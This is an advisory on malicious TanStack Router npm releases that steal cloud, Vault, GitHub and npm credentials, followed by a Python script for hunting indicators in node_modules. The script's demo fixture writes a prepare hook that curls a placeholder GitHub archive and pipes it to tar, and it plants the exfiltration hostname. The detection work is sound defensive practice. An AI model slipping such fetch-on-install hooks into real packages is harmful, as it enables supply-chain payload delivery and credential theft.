At least five TanStack Router npm packages have been compromised with malicious payloads built for credential theft. The affected versions contain a heavily obfuscated 2.3 MB script and a doctored package.json whose prepare script fetches a further payload from a GitHub cross-fork 'ghost commit' (a commit pushed to a fork that remains fetchable through the upstream repository's URL without appearing in any of its branches). The malware targets AWS instance and task-role credentials, HashiCorp Vault tokens, GitHub tokens, and npm tokens, and exfiltrates them over the Session messenger network. Developers should immediately stop installing the affected versions, audit any installs since 2026-05-11 19:20 UTC, rotate every secret on hosts that may have run the payload, and hunt for outbound connections to filev2.getsession.org. StepSecurity detected the compromise through automated analysis of new npm releases.
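The audit step above (find installs in the window, look for the GitHub-fetching install hook, the oversized script and the exfil hostname) can be turned into a local hunt over a node_modules tree. The script below is an added example, not StepSecurity's tooling or TanStack project code. Labelled assumptions: the affected packages sit under the @tanstack npm scope; the payload pull shows up as an install hook (prepare, preinstall, install or postinstall) whose command references a GitHub host; any JavaScript file of 2 MB or more is treated as a dropper candidate; and the exfil hostname appears in plain text inside the package. The window start and the hostname come from the summary; the sample packages the demo builds are constructed.

```python
"""Hunt a node_modules tree for the indicators in the advisory above.

Added example; not StepSecurity's or TanStack's code. Assumptions are marked.
"""
import json
import os
import re
import tempfile
from dataclasses import dataclass, field
from datetime import datetime, timezone

EXFIL_HOST = "filev2.getsession.org"                                  # from the advisory
COMPROMISE_START = datetime(2026, 5, 11, 19, 20, tzinfo=timezone.utc)  # from the advisory
SUSPECT_SCOPE = "@tanstack/"        # assumption: affected packages live in this scope
BIG_SCRIPT_BYTES = 2 * 1024 * 1024  # assumption: dropper candidate threshold (advisory: 2.3 MB)
HOOKS = ("prepare", "preinstall", "install", "postinstall")  # assumption: hooks worth checking
GITHUB_FETCH = re.compile(r"github\.com|githubusercontent\.com")


@dataclass
class Finding:
    package: str   # name@version
    path: str      # package directory
    reasons: list = field(default_factory=list)


def scan_package(pkg_dir, scope=SUSPECT_SCOPE, since=COMPROMISE_START):
    """Return a Finding for one installed package, or None when nothing matches."""
    manifest_path = os.path.join(pkg_dir, "package.json")
    try:
        with open(manifest_path, "rb") as fh:
            manifest = json.load(fh)
    except (OSError, ValueError):
        return None
    name = manifest.get("name", "")
    if scope and not name.startswith(scope):
        return None
    finding = Finding(f"{name}@{manifest.get('version', '?')}", pkg_dir)

    # 1. Install hooks that reach out to GitHub (the cross-fork payload pull).
    scripts = manifest.get("scripts") or {}
    for hook in HOOKS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str) and GITHUB_FETCH.search(cmd):
            finding.reasons.append(f"{hook} hook fetches from GitHub: {cmd!r}")

    # 2. Oversized scripts and plain-text references to the exfil host.
    for dirpath, _, filenames in os.walk(pkg_dir):
        for fn in filenames:
            fp = os.path.join(dirpath, fn)
            try:
                size = os.path.getsize(fp)
                if fn.endswith((".js", ".cjs", ".mjs")) and size >= BIG_SCRIPT_BYTES:
                    finding.reasons.append(f"large script {fn} ({size} bytes)")
                with open(fp, "rb") as fh:
                    if EXFIL_HOST.encode() in fh.read():
                        finding.reasons.append(f"{fn} references {EXFIL_HOST}")
            except OSError:
                continue

    # 3. Note whether the install landed inside the compromise window.
    if not finding.reasons:
        return None
    installed = datetime.fromtimestamp(os.path.getmtime(manifest_path), tz=timezone.utc)
    if installed >= since:
        finding.reasons.append(f"package.json written {installed.isoformat()}, after window start")
    return finding


def scan_node_modules(root, scope=SUSPECT_SCOPE, since=COMPROMISE_START):
    """Walk root (a node_modules directory) and scan every package.json found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if "package.json" in filenames:
            finding = scan_package(dirpath, scope, since)
            if finding:
                findings.append(finding)
    return findings


def build_sample_tree(base):
    """Construct a tiny node_modules with one clean and one suspicious package.
    All contents are made up for this example; the hook URL is a placeholder."""
    nm = os.path.join(base, "node_modules", "@tanstack")
    clean, bad = os.path.join(nm, "clean-pkg"), os.path.join(nm, "bad-pkg")
    os.makedirs(clean)
    os.makedirs(bad)
    with open(os.path.join(clean, "package.json"), "w") as fh:
        json.dump({"name": "@tanstack/clean-pkg", "version": "1.0.0"}, fh)
    with open(os.path.join(clean, "index.js"), "w") as fh:
        fh.write("module.exports = {};\n")
    with open(os.path.join(bad, "package.json"), "w") as fh:
        json.dump({"name": "@tanstack/bad-pkg", "version": "9.9.9", "scripts": {
            "prepare": "curl -sL https://github.com/example-org/example-fork/archive/0000000.tar.gz | tar xz"}}, fh)
    with open(os.path.join(bad, "index.js"), "w") as fh:  # oversized blob carrying the exfil host
        fh.write(f'var h="{EXFIL_HOST}";/*' + "A" * BIG_SCRIPT_BYTES + "*/")
    t0 = COMPROMISE_START.timestamp()  # constructed timestamps: clean before, bad after the window start
    os.utime(os.path.join(clean, "package.json"), (t0 - 86400, t0 - 86400))
    os.utime(os.path.join(bad, "package.json"), (t0 + 3600, t0 + 3600))
    return os.path.join(base, "node_modules")


def run_demo(scope=SUSPECT_SCOPE):
    """Build the sample tree in a temp dir, scan it and return the findings."""
    return scan_node_modules(build_sample_tree(tempfile.mkdtemp(prefix="tanstack-hunt-")), scope)


if __name__ == "__main__":
    for f in run_demo():
        print(f.package, f.path)
        for r in f.reasons:
            print("  -", r)
```

Point `scan_node_modules` at a real project's node_modules to use it; a finding with only the "large script" reason is weak on its own (bundled builds are routinely that size), but one that also carries a GitHub-fetching hook or the exfil hostname is worth treating as a confirmed hit and triggering the rotation steps above.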

From stepsecurity.io